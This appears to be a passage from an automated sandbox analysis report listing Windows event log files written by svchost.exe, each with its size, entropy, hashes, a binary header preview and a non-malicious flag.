                                                                        Preview:ElfChnk............................................lK..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F....................C.......................J...............................................................i...................F......e...........**..............."s...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):66960
                                                                        Entropy (8bit):4.285755233928464
                                                                        Encrypted:false
                                                                        SSDEEP:384:BVNVmhsVPVUVvVoVTVXV8VMVxVIVyV5JVYV6VCiVfV5V/VBVAVOVqVqV1VHV3Vie:aI1u
                                                                        MD5:4605B31F39A755C7820C3D0A9B894237
                                                                        SHA1:AE5142A625FA1395E4012DBF8D5EC66DC04E01BF
                                                                        SHA-256:2982DE7746EBB9F626799766FCFA619EEBA8D930DAA7B7C5A02C58B3352365D8
                                                                        SHA-512:AE7277FFCEBA9174DC2095C2D63AAF3004F1C75126331D63FF1DFEFD76136F2E6943D53B9A207FC70949F374B3C95A300DABAC66B6ED1653463D7C12900AD60A
                                                                        Malicious:false
                                                                        Preview:ElfChnk.i...............i...................H........f./.......................................................................i................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................................................3.......................................................8..........................&...Y1......**..............H.T.6.........F..&...............................................................@.......X...a.!.....E..........@H.T.6............A...................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....l.o....**..............E2V.6.........F.

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.423265177202914
                                                                        Encrypted:false
                                                                        SSDEEP:384:67UhsmYDQlm9cKrRtUmNmHumtTmgm5wQXvZ7bmO8mfQE3mq9mqmxqm6nFmCWmnsn:XMrJcWHvqisqnvokZRKeTSPnSKn
                                                                        MD5:34B35A683C68A73A1BF569F68E54DB0D
                                                                        SHA1:FC5C102CFE726B21653E768ADA9A275FADA90550
                                                                        SHA-256:82203A8B2AF5D6CF60E99ADA87DF17CED01A954F995B6649E26E1C08FB97BEC9
                                                                        SHA-512:E547B36385DBFBAF0D825AE5475C3CEF0B1949E632402D94385794F1AA1A8A565738FA29C4F895894DB61B86CE7F29DF2D389CFF63D9D246AE5157BAB20DABB1
                                                                        Malicious:false
                                                                        Preview:ElfChnk..0.......0.......0.......0..........x...X...iS.~........................................................................................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...................................C\..........................................KJ...............H..;d.......X..............#...........%...........**.......0....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.46195821683625526
                                                                        Encrypted:false
                                                                        SSDEEP:96:ENVaO8sMa3Z85ZMLe5yrjjv3Z85ZCtV3Z85Zx3Z85Zu:aV7pp8nMLe8vvp8nCtVp8nxp8n
                                                                        MD5:5ACAAE41499E7308E5275722CCD56A6B
                                                                        SHA1:D725F4876F0F7AAA657E82D73E432AE1F64DFE03
                                                                        SHA-256:75CBB6A56620AA15E6AA888A9DCCE34647D8C67B60003951B8E09B5A09CDC574
                                                                        SHA-512:80F61A3EB53F16883C03C128C957DF1DCF29B43B847298B5BE94362A6FB0B9108B2932B75260CF709CFC08063D19B8EEAD8E1C2966A32A76377EE2E40CB1D10F
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................P.......WW......................................................................k...............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Telemetry.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.416807332891786
                                                                        Encrypted:false
                                                                        SSDEEP:1536:CbBN2A4VD7VAx8whAGU2woJQghgooKChi581UAkM:
                                                                        MD5:8B93FFD74BA69D506BC1A7CA93434764
                                                                        SHA1:8275F283E3EB6143F33D1B97C889D167963A9B41
                                                                        SHA-256:9D1B6EA5CF8330CB2CE526B709669FCF7BD756EE43E30230B98F3FBE6B80D227
                                                                        SHA-512:8EED6493C2C3B9BD2B0DB0ECF80B6FFCC007A1BB618725BC5681469894965CE2606589062BA941C6B29D23F9A5F46EE9613F2FA46AC0B587CB6130EA99E24A15
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........b...............b...............@...........................................................................Z!H.............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.519960906808938
                                                                        Encrypted:false
                                                                        SSDEEP:768:7PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9ZFN9NxKk:vXY5nVYIyyqED5BVZUeJ+EsiA881rXT
                                                                        MD5:F2DD657C9A1CB9C4DE1DF89C0F45E5F1
                                                                        SHA1:A9B48C4B4F004BE9F9641753D4BAEADD209BC4EF
                                                                        SHA-256:7601EB81F47B9DFC18BAD436F6657EBFD07782F6C8BC681A76DEFC69C6104613
                                                                        SHA-512:C226D4C11D55C8BA887F2A6314B2C797CA60A12B90C066E7929E0CF182440D3E246C9399D4118FD5E781C7998A85E78AEF363D54D68DA86E39BF6D9F07DA6441
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........|...............|...................%DkZ........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y...........>...........**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):91344
                                                                        Entropy (8bit):2.4884378802135716
                                                                        Encrypted:false
                                                                        SSDEEP:384:qhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorrTo9orForAorlorM:qDCpI8DCpI+
                                                                        MD5:C2F9DDC874D6890A9CBB8E5B618E7785
                                                                        SHA1:7582FF454B7BD9CCB726288CB98177FCA8935ED0
                                                                        SHA-256:87A1EF661041699B9420F0459BA1E803FB5C81C0C63519AB64471E7A374FB1A6
                                                                        SHA-512:BC78E4BCA586E5A25ACF6F3B4D282808824962C79A7D2234A3647C21EFA7CB14CE2EC0591428A39B346FA5CDEF87EC13EF861A285BBE27A6A2B129999247A71F
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................`J...L.............................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/..............U)..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.8512934663046342
                                                                        Encrypted:false
                                                                        SSDEEP:384:vhAiPA5PNPxPEPHPhPEPmPSPRP3PoP1P0mPQP1P9xP:v2Nz
                                                                        MD5:B58E72BD85CF367466349FADCF9A5818
                                                                        SHA1:0F561886DC1FC8FBCA5DC8CA10DB1A7C34CEE419
                                                                        SHA-256:D6F533FC5273A6E86F4295EE8935D94CC1A1CCD12A0DCA9C6C9723F852772861
                                                                        SHA-512:32893F184EE6EA667D4FA98625F5B0192256F05E072513D2F68C3078FA2002824DB743BF759C5DEF4EBFD92D4257E5EE06FF584D0F4A79D8A964FA2C65CFCA01
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................%...&.........................................................................p4..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.8432260898567245
                                                                        Encrypted:false
                                                                        SSDEEP:384:hhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lD:hWXSYieD+tvgzmMvG5m2a0
                                                                        MD5:9BCAC131A0E1046D07A1126509C0163B
                                                                        SHA1:668C02B1F04155FC7C86DA0FD801AB8512D8E647
                                                                        SHA-256:A069A8295BD4D219C7E117748EC00A8CE85C3AD2F84991B77311E865DA012C90
                                                                        SHA-512:11CECFB1CC6FB52B75BBEADCB99337634B61B1D4B78514905846BC0D6F57704EFDD01E59177C0A843FB8346DF2AEF6FF00315D1597E526F4408368A0834B4E90
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................$...&............................................................................W................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................&...........**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.136765029033778
                                                                        Encrypted:false
                                                                        SSDEEP:384:YhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28E:YbCyhLfISid
                                                                        MD5:D8A9364C2A73C13BD5856B2098B148FE
                                                                        SHA1:246D2BD0425327769639DDD2E3EAB16EAAFC47BD
                                                                        SHA-256:3BC0F301126D61B2589EF8EA5BFD37E99521C28A16A2448614DA5D2008383417
                                                                        SHA-512:C1E00E7A552DAE3757379821AB874FFBB73498B001266EF5A832AB77B660E700C581A10A66B7EA3DB617A6383DF8AC808CEFA6AA9D510973237040AFEE4A734E
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........L...............L...........P........Q......................................................................g..%................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n............................................................................v..........**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.299614116317659
                                                                        Encrypted:false
                                                                        SSDEEP:768:WcMhFBuyKskZljdoKXjtT/r18rQXn8iLqa3:PMhFBuV
                                                                        MD5:7BBCE1A6E856D904039BACFFA90C55A7
                                                                        SHA1:C3FFB49873328C3A17FFF125BD311AB4A864DBB9
                                                                        SHA-256:8F96E6519D5B0F66F01D26CF62B9AB7C5D35353FE6BA0C55AA6A5D935AF5B4D0
                                                                        SHA-512:C74AF384495FE23ECBE2AE9410966CE14A886E80DB90DD68751EBBC470874A49A20E978E0D2FAE28942F534F24F0ABF70EED1390F102E70BFB1B5C1903C4F47B
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........L...............L.........................................................................................~..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.896745651566555
                                                                        Encrypted:false
                                                                        SSDEEP:768:nre2Q+uYvAzBCBao/F6Cf2SEqEhwaK41HZaWRSgELNnLi:WHf
                                                                        MD5:396196233DA144BC9B1AC36AEBA3FA42
                                                                        SHA1:B5800B9F323B93BCBCFA9D2F727A9975CACD6337
                                                                        SHA-256:4A268F50173502D662F85D13944A1249B58912BCD3BC9FA6B419CB1E561D2969
                                                                        SHA-512:A0C83A765A92F558C0BBD72D418D6C8A2AB26F90A71DA6B5342C1AC98E3BB3AC0A57E6DBA86AB7334276A0058863364C36D8205EEBEAF1B29B411860DA528F61
                                                                        Malicious:false
                                                                        Preview:ElfChnk.v.......x.......v.......x...........P...`...d........................................................................X.e........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..@...v.......<..:..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.924636023538134
                                                                        Encrypted:false
                                                                        SSDEEP:384:wh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDx:wMAP1Qa5AgfQQn
                                                                        MD5:8EC9027553BC6E0AA226CBE3AA9AEC1A
                                                                        SHA1:3E261D8E27902EB9EEF0333F5716E2298FE8FA55
                                                                        SHA-256:A2261A47F8E8D6F1E200968E7080400155424C4DD140F281C48FEACD0017A010
                                                                        SHA-512:859C59B36EFF5DCEBD329ABED2952EE5ECE6B4D5A8918C341878E77ABEC82C6B2CA0F7392E5DF79C30A004ECF82664DBA87381739F55FC7D6547AC84DDA1BA65
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................0_..0b.............................................................................o................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&..............;....................R..........**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.4435307576303655
                                                                        Encrypted:false
                                                                        SSDEEP:384:3hBE0EGEq0EJE9EdEmE0S4E9/8OaExy4vEeE0TEVzEfEm/8E3VEQEoEwDEfEtEMZ:35SWOQRjEHgl4iYlz
                                                                        MD5:A8DA15633D80829F32A3E0CD50CFD995
                                                                        SHA1:CD4DD833ED62AD6DEE8A4B109A0356075CCDB8EC
                                                                        SHA-256:30BF357C2ADCC24F1A1A48EA85302CB33B8993899685FFFFDC13CD2E4A15C05F
                                                                        SHA-512:C7D808E257302F4D08623CE5C5A8D622CE946ADAA2543EE97A1AD3759CF11F93FAAFC8D786CDD4B32A1CBC1E97D5472A30B2A1EBADD5014F7F11BF2B92F1EA8B
                                                                        Malicious:false
                                                                        Preview:ElfChnk.s...............s...................@.......N...........................................................................................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F....................@...............>... ..E....................$...........(...&.......".......................F...........D...............Q......**......s....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.3316790418382953
                                                                        Encrypted:false
                                                                        SSDEEP:384:ahYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl/:a1T4hy3V3
                                                                        MD5:F7D62B056AB8FE4B83092B05915DD92A
                                                                        SHA1:7310B87EC20943EE7854A907C4F807D04D148ABF
                                                                        SHA-256:337F9831E9B639FC1523A9EBBDBA186A13D82AF929262CCA31F9FE0677B18E4A
                                                                        SHA-512:23FA4D0C18EFC32B8D0A7E5472973DFE557BC793E1BA38468CF5760561700FC1F7965B5A231F76D277B49E5B5E381F8773ED88E6B472CFAC78D5332A495F33ED
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........m...............m...........@.......r9{.....................................................................g..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../...........n...........**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):2.4485744286205566
                                                                        Encrypted:false
                                                                        SSDEEP:384:GhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDfi:GzSKEqsMuy645tZtPN
                                                                        MD5:4572B4ADCED1EA2335588876D2A4AF20
                                                                        SHA1:0F16E0FF89200599B7DB688563F2E6B656ECFD4B
                                                                        SHA-256:68B18DB8939820C2E1E49267F4DA6D5F9EEBECF40A43BE0DEE1643D96CD5FE4C
                                                                        SHA-512:6D9E98838FEE3DB11033784CA8A912608F7814D2353C14C839BC372CE4EBF0AC9D05984EA3FE0B153062BAE55CB850277100569B37ED1B798CCDCA1E7746AD57
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........L...............L....................:.N....................................................................j...................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=....................................................................`..........**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):2.1559400308203562
                                                                        Encrypted:false
                                                                        SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zZ:Bmw9g3Lf
                                                                        MD5:64B9990B5E7F3874310C63A28FF2269B
                                                                        SHA1:B1A4325EECAFB72D9AFF23F1759F866757699E9E
                                                                        SHA-256:3C9770DF816491A1C40167F1C53A46FB17122962B646A72F604ED3044A981DCC
                                                                        SHA-512:BC184A0543AC3022AC17527A5569CA2105E1A9B779B829A7B1FB3A72BD2B429797E1E09A229880E5803F38809A17D2FE019374D87EBC6658AB55DB837DF5C6A3
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........6...............6...........(o...p...].O....................................................................|.3.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#....................................................................X..........**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.887574143139413
                                                                        Encrypted:false
                                                                        SSDEEP:384:BhoIRbiY8sITkAI6RdkbI4IfIixIWMIPIxIJI7IyIUIgIoqIuILI:BOnDB
                                                                        MD5:59A9F7EF42800364F6BF938C549BBD94
                                                                        SHA1:43FAC818EB3960E73963CFD78F1AE4DE6A3799D6
                                                                        SHA-256:E2BD020B97A6FB59EF57126B4DC72C56E7F457A06C7F911243C77BC0C1ACC206
                                                                        SHA-512:2A62CCA656E0761FF2C1F585207C03B19E9E827C80293C9A402C01A353D47774BC97A7A48CD136862131F18434DD29245D3A1E20E88A72AF45824ECAB6B26153
                                                                        Malicious:false
                                                                        Preview:ElfChnk.K.......L.......K.......L...........x...86.....&......................................................................e.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..x...K.....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                                                        Download File
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
                                                                        Category:dropped
                                                                        Size (bytes):69080
                                                                        Entropy (8bit):4.509836825394857
                                                                        Encrypted:false
